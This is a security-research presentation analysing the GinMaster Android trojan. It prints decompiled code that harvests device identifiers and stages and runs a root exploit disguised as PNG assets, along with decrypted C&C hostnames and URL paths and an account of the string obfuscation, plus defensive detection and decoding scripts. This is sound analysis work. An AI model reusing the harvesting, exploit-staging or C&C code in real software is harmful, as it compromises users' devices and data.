GinMaster Android Malware Analysis

GinMaster is a family of trojanized Android apps that has been distributed through third-party app stores in China since August 2011. It gains root on the device with the GingerBreak exploit against Android 2.3 (Gingerbread), harvests device and user identifiers (IMEI, IMSI, phone number and others) into an on-device SQLite database, and reports them to a remote command and control server over HTTP. The apps carry their ELF binaries and shell scripts disguised as PNG assets, install other apps silently on command, and have moved to obfuscated and encrypted strings over three generations.

GinMaster

A case study in Android malware

Rowland YU
Threat Research, SophosLabs

What is GinMaster?

Android GinMaster is
• a trojanized and re-packaged application family
• distributed in Chinese third-party stores
• targeting Android mobile devices

Where does GinMaster come from?

• Discovered in August 2011
• First Android malware to use the GingerBreak root exploit against Android 2.3 (code name Gingerbread)
• First named GingerMaster, now known as GinMaster

What about GinMaster?

• Duration
• Volume
• Growth
• Location
• Types
• Complexity
• $$$
• Comparison between PC and Android Malware
Long Duration

26 months of GinMaster attacks since August 2011

Top 3 Android Malware by Volume

[Pie chart: GinMaster versus the rest of Android malware. GinMaster accounts for 19,100 samples, 4% of the total; 300+ malware families have been recorded by SophosLabs.]

Dramatic Growth of GinMaster Variants

[Bar chart, quarterly view: number of new GinMaster variants per quarter, y-axis 0 to 6000]

Location – China

150M Android devices in China

[Pie chart, source idc.com: 2012 smartphone market share by country. China 27%; the remaining slices (USA, India, Brazil, United Kingdom, Rest of World) are labelled 46%, 18%, 6%, 3% and 2%.]

Location – Chinese third-party stores

Over 400 popular third-party stores in China

Location – high infection rate in China

2013 Global Infection Rates (report from NQ Mobile)
• China: 31.71%
• Russia: 17.15%
• India: 10.38%
• USA: 6.53%

Types of Android Malware

[Diagram: GinMaster at the centre of the Android malware types: Data Stealer, Premium Service Abuser, Rootkit, Click Fraudster, Trojan Spy, Malicious Downloader]

Complexity – Sophisticated Functionalities

[Figure: teardown of the 1st GinMaster generation]

[Video: GinMaster demonstration]

Anatomy of GinMaster

• Permissions
• AndroidManifest file
• Main part of malicious code
• Binaries and shell scripts
• Database
• Command and Control

Permissions
uses-permission:'android.permission.READ_PHONE_STATE'
uses-permission:'android.permission.READ_LOGS'
uses-permission:'android.permission.DELETE_CACHE_FILES'
uses-permission:'android.permission.ACCESS_CACHE_FILESYSTEM'
uses-permission:'android.permission.WRITE_SECURE_SETTINGS'
uses-permission:'android.permission.ACCESS_NETWORK_STATE'
uses-permission:'android.permission.INTERNET'
uses-permission:'android.permission.WRITE_EXTERNAL_STORAGE'
uses-permission:'android.permission.MOUNT_UNMOUNT_FILESYSTEMS'
uses-permission:'android.permission.READ_OWNER_DATA'
uses-permission:'android.permission.WRITE_OWNER_DATA'
uses-permission:'android.permission.WRITE_SETTINGS'
uses-permission:'com.android.launcher.permission.INSTALL_SHORTCUT'
uses-permission:'com.android.launcher.permission.UNINSTALL_SHORTCUT'
uses-permission:'android.permission.RECEIVE_BOOT_COMPLETED'
uses-permission:'android.permission.RESTART_PACKAGES'
uses-permission:'android.permission.READ_EXTERNAL_STORAGE'

AndroidManifest file
<activity android:label="@string/image_name" android:icon="@drawable/image_icon"
    android:name=".Web" android:launchMode="singleInstance"
    android:screenOrientation="portrait" android:configChanges="keyboardHidden|orientation">
……

<service android:name=".GameService" android:enabled="true" android:exported="true">
    <intent-filter>
        <action android:name="android.intent.action.MAIN" />
        <category android:name="android.intent.category.LAUNCHER" />
    </intent-filter>
</service>

<receiver android:name="GameBootReceiver">
    <intent-filter>
        <action android:name="android.intent.action.BOOT_COMPLETED" />
    </intent-filter>
</receiver>

The malicious service is exported and carries a MAIN/LAUNCHER intent filter, which belongs on an activity in a genuine app; the receiver restarts the service at every boot.

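The manifest traits above (an exported service carrying a MAIN/LAUNCHER filter, a BOOT_COMPLETED receiver, and the permission set from the previous slide) can be checked mechanically. The following is an added example, not SophosLabs' or the malware author's code: it reconstructs a manifest from the fragment shown here (the package name, the omitted attributes and the exact permission subset are assumptions) and scores it with a few triage rules. Real APKs store the manifest as binary XML, so run `apktool d` or `aapt dump xmltree` first and feed the decoded text in.

```python
"""Triage an AndroidManifest.xml for GinMaster-style traits.

Added example, not from the talk. SAMPLE_MANIFEST is constructed from the
fragment on the slide; package name and attribute subset are assumptions.
"""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"


def a(attr):
    """Qualify an attribute name with the android: namespace."""
    return f"{{{ANDROID_NS}}}{attr}"


SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.gamesvc">
  <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
  <uses-permission android:name="android.permission.READ_LOGS"/>
  <uses-permission android:name="android.permission.WRITE_SECURE_SETTINGS"/>
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.MOUNT_UNMOUNT_FILESYSTEMS"/>
  <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
  <uses-permission android:name="com.android.launcher.permission.INSTALL_SHORTCUT"/>
  <application>
    <activity android:name=".Web" android:launchMode="singleInstance"/>
    <service android:name=".GameService" android:enabled="true" android:exported="true">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
      </intent-filter>
    </service>
    <receiver android:name="GameBootReceiver">
      <intent-filter>
        <action android:name="android.intent.action.BOOT_COMPLETED"/>
      </intent-filter>
    </receiver>
  </application>
</manifest>
"""

# Permissions that rarely belong in a repackaged game or picture viewer.
HIGH_RISK_PERMISSIONS = {
    "android.permission.READ_LOGS",
    "android.permission.WRITE_SECURE_SETTINGS",
    "android.permission.MOUNT_UNMOUNT_FILESYSTEMS",
    "android.permission.RESTART_PACKAGES",
    "android.permission.DELETE_CACHE_FILES",
    "android.permission.ACCESS_CACHE_FILESYSTEM",
}


def triage_manifest(xml_text):
    """Return a list of (severity, finding) tuples for a decoded manifest."""
    root = ET.fromstring(xml_text)
    findings = []
    perms = {p.get(a("name")) for p in root.iter("uses-permission")}
    for p in sorted(perms & HIGH_RISK_PERMISSIONS):
        findings.append(("high", f"requests {p}"))
    if {"android.permission.READ_PHONE_STATE", "android.permission.INTERNET"} <= perms:
        findings.append(("medium", "can read IMEI/IMSI and reach the network"))
    for svc in root.iter("service"):
        exported = svc.get(a("exported")) == "true"
        actions = {x.get(a("name")) for x in svc.iter("action")}
        if exported and "android.intent.action.MAIN" in actions:
            findings.append(("high", f"service {svc.get(a('name'))} is exported and "
                                     "carries a MAIN/LAUNCHER filter (launcher filters belong on activities)"))
    for rcv in root.iter("receiver"):
        actions = {x.get(a("name")) for x in rcv.iter("action")}
        if "android.intent.action.BOOT_COMPLETED" in actions:
            findings.append(("medium", f"receiver {rcv.get(a('name'))} runs on BOOT_COMPLETED"))
    return findings


def risk_score(findings):
    """Weighted sum: high = 3, medium = 1."""
    weights = {"high": 3, "medium": 1}
    return sum(weights[sev] for sev, _ in findings)


if __name__ == "__main__":
    found = triage_manifest(SAMPLE_MANIFEST)
    for sev, msg in found:
        print(f"[{sev}] {msg}")
    print("score:", risk_score(found))
```

The rules are deliberately coarse; their value is in combination, so treat the score as a sort key for a sample queue rather than a verdict.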
'GameService' – main part of the malicious code
// register a PACKAGE_ADDED receiver; the same GameBootReceiver class that the manifest
// binds to BOOT_COMPLETED is registered here dynamically for package events
IntentFilter localIntentFilter1 = new IntentFilter("android.intent.action.PACKAGE_ADDED");
localIntentFilter1.addAction("android.intent.action.PACKAGE_ADDED");
// the misspelled category is the sample's own; the filter still matches because the
// PACKAGE_ADDED broadcast carries no categories
localIntentFilter1.addCategory("android.intent.categroy.DEFUAULT");
localIntentFilter1.addDataScheme("package");
this.c = new GameBootReceiver();
registerReceiver(this.c, localIntentFilter1);
// register a PACKAGE_REMOVED receiver (same receiver instance)
IntentFilter localIntentFilter2 = new IntentFilter("android.intent.action.PACKAGE_REMOVED");
localIntentFilter2.addAction("android.intent.action.PACKAGE_REMOVED");
localIntentFilter2.addCategory("android.intent.categroy.DEFUAULT");
localIntentFilter2.addDataScheme("package");
registerReceiver(this.c, localIntentFilter2);

// create a SQLite database used for harvesting package information
// (268435456 = 0x10000000, the value of SQLiteDatabase.CREATE_IF_NECESSARY)
this.a = openOrCreateDatabase("game_service_package.db", 268435456, null);
this.a.execSQL("CREATE TABLE IF NOT EXISTS game_package (package_name char(128) not null default '', version_name char(128) not null default '', version_code char(16) not null default '', status char(1) not null default '1', soft_id char(10) not null default '', primary key (package_name))");
Log.i("GameSvc", "create db in onCreate");
this.a.execSQL("CREATE INDEX IF NOT EXISTS pni ON game_package (package_name)");
this.a.execSQL("CREATE INDEX IF NOT EXISTS si ON game_package (soft_id)");
// collect sensitive information including the device id, phone number, network type and others
// (this.f .. this.k are obfuscated fields filled in elsewhere in the service)
SharedPreferences.Editor localEditor = this.b.edit();
localEditor.putString("imei", this.f);
localEditor.putString("imsi", this.g);
localEditor.putString("cpuid", this.k);
localEditor.putString("simNum", this.h);
localEditor.putString("telNum", this.i);

// ELF32 ARM binaries and shell scripts, shipped as *.png assets; a() drops each one into
// the app's files directory under the *.sh name that the chmod below targets
a("gbfm.png");
a("install.png");
a("installsoft.png");
a("runme.png");
}
try
{
// make the dropped files executable and launch the exploit in the background
String str = "chmod 775 " + getFilesDir() + "/gbfm.sh " + getFilesDir() + "/install.sh " + getFilesDir() + "/installsoft.sh " + getFilesDir() + "/runme.sh ";
Log.i("GameSvc", str);
Runtime.getRuntime().exec(str);

Binaries and shell scripts
All four ship inside the APK as assets with a .png extension, which hides them from a casual look at the package; none of them is an image.
• gbfm.png – the exploit binary (GingerBreak) used to escalate to root
• install.png – a shell script that sets up files in the system partition for later use
• installsoft.png – another shell script, used by the remote command & control service to install applications silently
• runme.png – an ELF binary that executes the above shell scripts

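The four payloads are told apart from real images by their first bytes, not by their names. As an added example (not from the talk), the script below builds an APK-like zip in memory from constructed assets, including an ELF32 header with e_machine 0x28 (ARM) and a shell script, and lists every asset whose extension claims an image but whose magic says ELF or script. Pass a real APK's bytes to find_disguised_assets to run it on a sample.

```python
"""List APK assets whose extension lies about their content.

Added example, not SophosLabs code. build_constructed_apk() fabricates a
minimal zip with one real PNG and three disguised payloads so the check runs
offline; real samples are scanned by passing the APK's bytes instead.
"""
import io
import zipfile

ELF_MAGIC = b"\x7fELF"
PNG_MAGIC = b"\x89PNG\r\n\x1a\n"
IMAGE_EXTS = {".png", ".jpg", ".jpeg", ".gif", ".bmp"}


def classify(data):
    """Coarse content type from the first bytes of a file."""
    if data.startswith(ELF_MAGIC):
        return "elf"
    if data.startswith(b"#!"):
        return "script"
    if data.startswith(PNG_MAGIC):
        return "png"
    if data.startswith(b"PK\x03\x04"):
        return "zip"
    return "unknown"


def elf_machine(data):
    """e_machine from an ELF header (offset 18, little-endian assumed); None if not ELF."""
    if not data.startswith(ELF_MAGIC) or len(data) < 20:
        return None
    return int.from_bytes(data[18:20], "little")


def find_disguised_assets(apk_bytes):
    """Return (name, ext, actual_type, e_machine) for assets/ or res/ files whose
    extension is an image type but whose content is an ELF binary or a script."""
    mismatches = []
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as z:
        for name in z.namelist():
            if not (name.startswith("assets/") or name.startswith("res/")):
                continue
            with z.open(name) as f:
                head = f.read(64)
            ext = name[name.rfind("."):].lower() if "." in name else ""
            actual = classify(head)
            if actual in ("elf", "script") and ext in IMAGE_EXTS:
                mismatches.append((name, ext, actual, elf_machine(head)))
    return mismatches


def build_constructed_apk():
    """Constructed test input: a zip shaped like an APK with disguised payloads."""
    # e_ident: magic, EI_CLASS=1 (32-bit), EI_DATA=1 (LE), EI_VERSION=1, pad to 16 bytes;
    # then e_type=2 (EXEC) and e_machine=0x28 (EM_ARM), followed by padding
    elf32_arm = (ELF_MAGIC + bytes([1, 1, 1, 0]) + bytes(8)
                 + (2).to_bytes(2, "little") + (0x28).to_bytes(2, "little") + bytes(32))
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("assets/logo.png", PNG_MAGIC + bytes(16))      # genuine image
        z.writestr("assets/gbfm.png", elf32_arm)                  # exploit binary
        z.writestr("assets/runme.png", elf32_arm)                 # script runner
        z.writestr("assets/install.png", b"#!/system/bin/sh\nmount -o remount,rw /system\n")
        z.writestr("classes.dex", b"dex\n035\0")
    return buf.getvalue()


if __name__ == "__main__":
    for name, ext, actual, machine in find_disguised_assets(build_constructed_apk()):
        extra = f" (e_machine=0x{machine:x})" if machine is not None else ""
        print(f"{name}: extension {ext} but content is {actual}{extra}")
```

Reading 64 bytes per entry keeps this cheap enough to run across a whole store feed; a hit on an ELF or `#!` header under an image name is worth a manual look regardless of what the rest of the app does.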
Database

game_package
  package_name char(128)
  version_name char(128)
  version_code char(16)
  status char(1)
  soft_id char(10)
  primary key (package_name)

game_service_download
  soft_id int(11)
  package_name varchar(32)
  app_name varchar(32)
  icon varchar(32)
  url varchar(32)
  status int(1)
  completed int(11)
  total int(11)
  filepath varchar(128)

game_service_folder
  file_id int(11)
  file_title varchar(32)
  icon_file varchar(128)
  package_name varchar(128)
  version_name varchar(32)
  version_code varchar(32)
  folder_id varchar(32)
  folder_title varchar(32)
  primary key (folder_id, package_name)

Command and Control

http://<url>/report/first_run.do – Report that GinMaster has started
http://<url>/report/install_success.do – Post package information when a package is installed
http://<url>/report/uninstall_success.do – Post package information when a package is uninstalled
http://<url>/report/install_list.do – Report information when installing a list of packages
http://<url>/request/config.do – Configure the frequency of checking in to the server
http://<url>/request/push.do – parameter soft_last_id
http://<url>/request/alert.do – parameter alert_last_id
http://<url>/request/index.do – purpose not determined
http://<url>/request/update.do – purpose not determined
http://<url>/client.php?action=softlist – Get the whole list of software
http://<url>/client.php?action=soft&soft_id= – Get a link to a specified piece of software
http://<url>/client.php?action=softlist&type=search&word= – Search the software list for a specified word

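Because the URI layout stayed constant while the C&C hostnames changed (compare the decrypted strings later in the deck), the paths in this table are a more durable detection pivot than any single domain. The following is an added example, not code from the presentation: it scans constructed proxy log lines (timestamps, client addresses and hostnames are placeholders) for these paths, and only escalates clients that both reported in and pulled software, since /request/index.do or /client.php on their own are too generic to alert on.

```python
"""Flag GinMaster check-ins in web-proxy logs using the C&C URI paths above.

Added example, not SophosLabs code. CONSTRUCTED_LOG uses a squid-like
'timestamp client method url status' layout with placeholder hosts.
"""
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Paths from the table. The hostname is deliberately not matched: the
# operators rotated domains, the URI layout stayed.
REPORT_PATHS = {"/report/first_run.do", "/report/install_success.do",
                "/report/uninstall_success.do", "/report/install_list.do"}
REQUEST_PATHS = {"/request/config.do", "/request/push.do", "/request/alert.do",
                 "/request/index.do", "/request/update.do"}
CLIENT_ACTIONS = {"softlist", "soft"}

LOG_RE = re.compile(r"^(?P<ts>\S+) (?P<client>\S+) (?P<method>[A-Z]+) (?P<url>\S+) (?P<status>\d{3})$")


def classify_url(url):
    """Label a GinMaster-looking URL ('report:first_run', 'client:soft', ...) or None."""
    parts = urlsplit(url)
    path = parts.path
    if path in REPORT_PATHS:
        return "report:" + path.rsplit("/", 1)[1][:-3]   # strip '.do'
    if path in REQUEST_PATHS:
        return "request:" + path.rsplit("/", 1)[1][:-3]
    if path.endswith("/client.php"):
        action = parse_qs(parts.query).get("action", [""])[0]
        if action in CLIENT_ACTIONS:
            return "client:" + action
    return None


def scan_log(lines):
    """Map client -> [(timestamp, label, hostname)] for every matching request."""
    hits = defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        label = classify_url(m["url"])
        if label:
            hits[m["client"]].append((m["ts"], label, urlsplit(m["url"]).hostname))
    return dict(hits)


def high_confidence(hits):
    """Clients that both reported in (/report/*) and fetched software (client.php)."""
    out = []
    for client, events in hits.items():
        labels = {label for _, label, _ in events}
        if any(l.startswith("report:") for l in labels) and any(l.startswith("client:") for l in labels):
            out.append(client)
    return sorted(out)


# Constructed log lines; hosts under .invalid/.example are placeholders.
CONSTRUCTED_LOG = [
    "1380000001.120 10.0.0.17 POST http://cnc.example.invalid:32873/report/first_run.do 200",
    "1380000002.331 10.0.0.17 GET http://cnc.example.invalid:32873/request/config.do 200",
    "1380000003.009 10.0.0.17 GET http://cnc.example.invalid:32873/client.php?action=soft&soft_id=1187 200",
    "1380000004.500 10.0.0.23 GET http://www.example.com/index.do 200",
    "1380000005.777 10.0.0.23 GET http://cdn.example.com/client.php?action=download 404",
    "1380000006.000 10.0.0.31 GET http://other.example.invalid/request/alert.do 200",
]

if __name__ == "__main__":
    hits = scan_log(CONSTRUCTED_LOG)
    for client, events in hits.items():
        print(client, [(label, host) for _, label, host in events])
    print("high confidence:", high_confidence(hits))
```

The single-hit client 10.0.0.31 is kept in the output for hunting but not escalated; a genuine infection produces the first_run report and a software pull within minutes of each other, which is the pairing high_confidence requires.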
Complexity – Obfuscation and Encryption

Evolution of GinMaster

Breakdown by Generation – Smarter GinMaster
• 1st Generation: 5%
• 2nd Generation: 37%
• 3rd Generation: 58%

2nd Generation – Close to Polymorphism
In the beginning of 2012

// decrypt a string: Base64-decode it (d.b), then XOR every byte with 0x78
public static String b(String paramString)
{
  byte[] arrayOfByte = d.b(paramString).getBytes();
  for (int i1 = 0; i1 < arrayOfByte.length; i1++)
    arrayOfByte[i1] = (byte)(0x78 ^ arrayOfByte[i1]);
  return new String(arrayOfByte);
}

Command and Control

Encrypted string (XORed with 0x78, Base64 encoded) – Decrypted string
EAwMCEJXVxtWSBcXSBcXSFYRFh4XQktKQE9LVxsUER0WDBYdD1YIEAg= – http://c.0oo0oo0.info:32873/clientnew.php
EAwMCEJXVxtWGQgIDh0KER4BVhEWHhdCS0pAT0tXGxQRHRYMFh0PVggQCA== – http://c.appverify.info:32873/clientnew.php
GRsMERcWRQodCBcKDF4MAQgdRREWCwwZFBQnCw0bGx0LCw== – action=report&type=install_success
GRsMERcWRQodCBcKDF4MAQgdRRwXDxYUFxkcJwsNGxsdCws= – action=report&type=download_success
GRsMERcWRQodCBcKDF4MAQgdRR4RCgsMJwoNFg== – action=report&type=first_run
GRsMERcWRRkUHQoM – action=alert
GRsMERcWRQgNCxA= – action=push
GRsMERcWRQsXHgxeCxceDCcRHEU= – action=soft&soft_id=

Plaintext in Database

Install Apk with Intent
// hand a downloaded APK to the package installer; 268435456 = 0x10000000 = FLAG_ACTIVITY_NEW_TASK
public final void a(String paramString)
{
  Intent localIntent = new Intent();
  localIntent.addFlags(268435456);
  localIntent.setAction("android.intent.action.VIEW");
  localIntent.setDataAndType(Uri.fromFile(new File(paramString)), "application/vnd.android.package-archive");
  startActivity(localIntent);
}

This route goes through the stock package installer, so the user sees the install prompt; the silent installs are done by the installsoft shell script with root.

Sophisticated 3rd Generation

Sample of encrypted and decrypted strings in the 3rd GinMaster Generation

Encrypted string (customized algorithm) – Decrypted string
JTk5PXdiYi5jfSIifSIifWMkIysid35/dXp+Yi4hJCgjOSMoOmM9JT0= – http://c.0oo0oo0.info:32873/clientnew.php
JTk5PXdiYi5jLD09Oyg/JCs0YyQjKyJ3fn91en5iLiEkKCM5Iyg6Yz0lPQ== – http://c.appverify.info:32873/clientnew.php
LC45JCIjcD8oPSI/OWs5ND0ocCQjPjksISESPjguLig+Pg== – action=report&type=install_success
LC45JCIjcD8oPSI/OWs5ND0ocCkiOiMSLD0m – action=report&type=down_apk
LC45JCIjcCwhKD85 – action=alert
LC45JCIjcCAiPygkIz45LCEhazk0PShwKig5 – action=moreinstall&type=get
Dh8IDBkIbRkMDwEIbQQLbQMCGW0IFQQeGR5t – CREATE TABLE IF NOT EXISTS
ZRY9LC4mLCooAywgKBBtOywfDgUMH2V+fWRtbRgDBBwYCG0DAhltAxgBAW0dHwQADB8UbQYIFGE= – ([packageName] vaRCHAR(30) UNIQUE NOT NULL PRIMARY KEY,

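The b() routine on the 2nd-generation slide is Base64-decode followed by a single-byte XOR, and every string in both tables can be checked against it. The following is an added example, not SophosLabs code: it re-implements b() in Python, adds the inverse for building detection strings, and recovers the key byte from a known plaintext prefix such as http:// or action=. Run against the 3rd-generation table above, the recovery returns 0x4d and those samples decode under the same scheme; the test vectors show that for the strings printed on these slides only, not for every 3rd-generation variant, which the deck describes as using a customized algorithm.

```python
"""Decode GinMaster strings (Base64, then XOR with one key byte) and recover
the key byte from a known plaintext prefix.

Added example, not SophosLabs code. Key 0x78 is the 2nd-generation value from
the slide; 0x4d is what recover_key() returns for the 3rd-generation samples.
"""
import base64


def decode_xor_b64(token, key=0x78):
    """Base64-decode `token`, then XOR every byte with `key` (this is b() from the slide)."""
    raw = base64.b64decode(token)
    return bytes(b ^ key for b in raw).decode("latin-1")


def encode_xor_b64(text, key=0x78):
    """Inverse of decode_xor_b64, for producing search strings under a new key."""
    return base64.b64encode(bytes(b ^ key for b in text.encode("latin-1"))).decode("ascii")


def recover_key(token, known_prefix):
    """Single key byte under which `token` decodes to something starting with
    `known_prefix`, or None. One byte of known plaintext fixes the key; the rest
    of the prefix is used to confirm it."""
    raw = base64.b64decode(token)
    if len(raw) < len(known_prefix) or not known_prefix:
        return None
    key = raw[0] ^ ord(known_prefix[0])
    if all((raw[i] ^ key) == ord(c) for i, c in enumerate(known_prefix)):
        return key
    return None


def candidate_keys(token):
    """Keys that turn the whole token into printable ASCII, for when no prefix is known."""
    raw = base64.b64decode(token)
    return [k for k in range(256) if all(32 <= (b ^ k) < 127 for b in raw)]


if __name__ == "__main__":
    gen2 = ["GRsMERcWRRkUHQoM", "GRsMERcWRQgNCxA=",
            "EAwMCEJXVxtWSBcXSBcXSFYRFh4XQktKQE9LVxsUER0WDBYdD1YIEAg="]
    for t in gen2:
        print("0x78", repr(decode_xor_b64(t)))
    gen3 = "LC45JCIjcCwhKD85"
    k = recover_key(gen3, "action=")
    print(f"recovered key 0x{k:02x}:", repr(decode_xor_b64(gen3, k)))
```

Key recovery is the part worth keeping: when the next variant changes the byte again, a handful of strings that must start with http:// or action= are enough to pull the key out without opening the decompiler.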
$$$

• Considerable profit generated by GinMaster
• The business model of GinMaster
• The business strategies of GinMaster

Inside the GinMaster $$$ Factory

[Diagram: 150M devices at a 7‰ infection rate gives roughly 1M infected devices. High risk, high yield path: 0.5-2 ¥ per installation, estimated 2-30,000 downloads/month, about 1M ¥. Low risk, low yield path: estimated 0.02 ¥ per user per day, about 0.5M ¥. Dollar figure shown: $245,000.]

Business Model of GinMaster

[Diagram with the actors Malware Writer, Third-Party App Stores, End Users, Command & Control, Legitimate Developers and Ads Agents, numbered as follows:
1. Malware writer uploads apps to third-party app stores
2. End users download apps carrying the malware code
3. The infected device sends device id, phone id, phone number, etc., and reports package info of packages installed or uninstalled on the device
4. Malware writer helps legitimate developers to promote their applications
5. Command & Control: change configuration, silently download files
6. Apps from the legitimate developers are downloaded to the infected devices
7. In-app ads and user downloads are settled through ads agents]

Business Strategies of GinMaster

To maximize profit, the malware writer has to keep the malicious applications on users' devices for as long as possible. The malware writer uses the following three strategies to achieve this.

Strategy 1
Pick the most suitable category to attract users.

[Three pie charts, one per generation, showing how the repackaged apps are spread across the categories Sexy Pic, Book and Game]

Strategy 2
Re-packaging interesting and exciting applications for downloading.

Strategy 3
Frequently change the signing certificate and the encryption algorithm to evade detection.

Frequency of each app certificate on average (how many apps share one certificate)
• 1st Generation: 33.19
• 2nd Generation: 3.81
• 3rd Generation: 1.32

The closer the figure is to 1, the closer the operators are to one certificate per app, which defeats detection keyed on the signing certificate.

Comparison between PC and Android Malware

Time until each technique first appeared on the platform:

Technique – PC – Android
Cipher – 2 years (XOR) – 4 months (DES)
Polymorphic – 6 years – 1.5 years
Botnet – 9 years – 1 year

Conclusion
• The GinMaster ecosystem is a representative model of Chinese Android malware.
• This model is reaching other emerging countries such as Thailand and Vietnam.
• There is no end to the war in sight.

The Android Malware Saga

To be continued

Q&A